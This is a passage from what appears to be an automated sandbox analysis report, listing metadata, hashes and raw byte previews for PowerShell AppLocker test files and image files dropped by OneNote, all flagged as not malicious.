                                                                                                                                                                                                              SHA-256:080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
                                                                                                                                                                                                              SHA-512:7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12180
                                                                                                                                                                                                              Entropy (8bit):5.318266117301791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                                                                                              MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                                                                                              SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                                                                                              SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                                                                                              SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67991
                                                                                                                                                                                                              Entropy (8bit):7.870481231782746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                                                                                              MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                                                                                              SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                                                                                              SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                                                                                              SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):179460
                                                                                                                                                                                                              Entropy (8bit):7.979020171518325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                                                                                              MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                                                                                              SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                                                                                              SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                                                                                              SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6507460920718255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra1W/bYyf9/UfovzfFFBtIaA2TZ2/2Wf/OQ2/q:Y1WTYyfSQvZtIaAym23Qmq
                                                                                                                                                                                                              MD5:3A8DF089CDA5648931CC6C61FF1DB501
                                                                                                                                                                                                              SHA1:986208ACF2D4C888AFB467DA089702308C6D0E4D
                                                                                                                                                                                                              SHA-256:F330F7CEE75D86EDC0F8AD60E0B0F5E413112245E42A86FEF146BCE9CB06B331
                                                                                                                                                                                                              SHA-512:2858B647EA83F9A569409595BE290E372E17232C5149680099AD14393884CBE914AF6AEE72E329973E146132C4F7A31DEFBA31DC9CE61B447ACEF8FC5D5D1304
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_7~.)=..@.@..I...................?.....I...............................................................................................................h............................................5.[...H......p.........{....+.@...%..p.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):99293
                                                                                                                                                                                                              Entropy (8bit):7.9690121496708555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                                                                                              MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                                                                                              SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                                                                                              SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                                                                                              SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79656
                                                                                                                                                                                                              Entropy (8bit):7.966459570826366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                                                                                              MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                                                                                              SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                                                                                              SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                                                                                              SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
